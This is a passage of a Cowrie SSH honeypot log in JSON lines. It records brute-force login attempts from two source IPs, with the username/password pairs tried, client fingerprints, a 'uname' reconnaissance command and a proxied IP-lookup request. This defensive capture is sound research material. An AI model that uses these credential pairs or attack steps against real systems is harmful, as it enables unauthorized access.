,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:49:49.420737Z","src_ip":"212.227.235.229","session":"5c2adf8ada40"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:49.652227Z","src_ip":"212.227.235.229","session":"01019dee749f"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:50.475310Z","src_ip":"212.227.125.160","session":"516b10734b51"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-31T04:49:51.021355Z","src_ip":"212.227.235.229","session":"5c2adf8ada40"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:52.281790Z","src_ip":"212.227.235.229","session":"5c2adf8ada40"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53330,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a6d9796abb5","protocol":"ssh","message":"New connection: 212.227.235.229:53330 (1.2.3.4:22) [session: 1a6d9796abb5]","sensor":"my-vps","timestamp":"2025-08-31T04:49:54.767339Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:49:54.856485Z","src_ip":"212.227.235.229","session":"1a6d9796abb5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45260,"dst_ip":"1.2.3.4","dst_port":22,"session":"328a2df81cd7","protocol":"ssh","message":"New connection: 212.227.235.229:45260 (1.2.3.4:22) [session: 328a2df81cd7]","sensor":"my-vps","timestamp":"2025-08-31T04:49:55.516563Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:49:56.223365Z","src_ip":"212.227.235.229","session":"328a2df81cd7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:49:56.224482Z","src_ip":"212.227.235.229","session":"328a2df81cd7"}
{"eventid":"cowrie.login.success","username":"root","password":"P@55w0rd","message":"login attempt [root/P@55w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:49:56.909591Z","src_ip":"212.227.125.160","session":"f43689ddd1cc"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:49:58.029886Z","src_ip":"212.227.235.229","session":"1a6d9796abb5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:49:58.092382Z","src_ip":"212.227.125.160","session":"f43689ddd1cc"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:49:58.093071Z","src_ip":"212.227.125.160","session":"f43689ddd1cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:58.513931Z","src_ip":"212.227.125.160","session":"f43689ddd1cc"}
{"eventid":"cowrie.session.closed","duration":"12.0","message":"Connection lost after 12.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:49:58.540875Z","src_ip":"212.227.125.160","session":"f43689ddd1cc"}
{"eventid":"cowrie.login.success","username":"root","password":"explorer","message":"login attempt [root/explorer] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:50:00.718630Z","src_ip":"212.227.235.229","session":"1a6d9796abb5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:50:01.013100Z","session":"1a6d9796abb5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:50:01.364307Z","src_ip":"212.227.235.229","session":"1a6d9796abb5"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"welcome","message":"login attempt [postgres/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T04:50:01.963791Z","src_ip":"212.227.235.229","session":"328a2df81cd7"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:02.067689Z","src_ip":"212.227.235.229","session":"1a6d9796abb5"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:03.998368Z","src_ip":"212.227.235.229","session":"328a2df81cd7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35230,"dst_ip":"1.2.3.4","dst_port":22,"session":"858adba2cf12","protocol":"ssh","message":"New connection: 212.227.235.229:35230 (1.2.3.4:22) [session: 858adba2cf12]","sensor":"my-vps","timestamp":"2025-08-31T04:50:04.232683Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48254,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4f041905c2b","protocol":"ssh","message":"New connection: 212.227.125.160:48254 (1.2.3.4:22) [session: a4f041905c2b]","sensor":"my-vps","timestamp":"2025-08-31T04:50:05.336982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:50:05.340351Z","src_ip":"212.227.125.160","session":"a4f041905c2b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:50:05.455199Z","src_ip":"212.227.235.229","session":"858adba2cf12"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:50:05.456318Z","src_ip":"212.227.235.229","session":"858adba2cf12"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:50:05.525433Z","src_ip":"212.227.125.160","session":"a4f041905c2b"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456","message":"login attempt [oracle/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:50:06.278746Z","src_ip":"212.227.125.160","session":"a4f041905c2b"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:07.469429Z","src_ip":"212.227.125.160","session":"a4f041905c2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32920,"dst_ip":"1.2.3.4","dst_port":22,"session":"280c7dfff27b","protocol":"ssh","message":"New connection: 212.227.125.160:32920 (1.2.3.4:22) [session: 280c7dfff27b]","sensor":"my-vps","timestamp":"2025-08-31T04:50:10.191504Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46492,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f8921f10cd9","protocol":"ssh","message":"New connection: 212.227.235.229:46492 (1.2.3.4:22) [session: 6f8921f10cd9]","sensor":"my-vps","timestamp":"2025-08-31T04:50:10.980989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:50:11.023987Z","src_ip":"212.227.235.229","session":"6f8921f10cd9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52318,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8bc0b1a6bff","protocol":"ssh","message":"New connection: 212.227.235.229:52318 (1.2.3.4:22) [session: f8bc0b1a6bff]","sensor":"my-vps","timestamp":"2025-08-31T04:50:11.248630Z"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:50:11.257346Z","src_ip":"212.227.235.229","session":"6f8921f10cd9"}
{"eventid":"cowrie.login.success","username":"root","password":"P@55w0rd","message":"login attempt [root/P@55w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:50:11.564735Z","src_ip":"212.227.235.229","session":"858adba2cf12"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:50:11.639509Z","src_ip":"212.227.235.229","session":"f8bc0b1a6bff"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:50:11.703519Z","src_ip":"212.227.235.229","session":"f8bc0b1a6bff"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:12.207289Z","src_ip":"212.227.125.160","session":"280c7dfff27b"}
{"eventid":"cowrie.login.failed","username":"belkinstyle","password":"72ca06","message":"login attempt [belkinstyle/72ca06] failed","sensor":"my-vps","timestamp":"2025-08-31T04:50:13.021764Z","src_ip":"212.227.235.229","session":"6f8921f10cd9"}
{"eventid":"cowrie.login.failed","username":"joro","password":"joro","message":"login attempt [joro/joro] failed","sensor":"my-vps","timestamp":"2025-08-31T04:50:13.302108Z","src_ip":"212.227.235.229","session":"f8bc0b1a6bff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:50:14.742242Z","src_ip":"212.227.235.229","session":"858adba2cf12"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:50:14.742990Z","src_ip":"212.227.235.229","session":"858adba2cf12"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:14.744946Z","src_ip":"212.227.235.229","session":"6f8921f10cd9"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:50:15.827753Z","src_ip":"212.227.235.229","session":"f8bc0b1a6bff"}
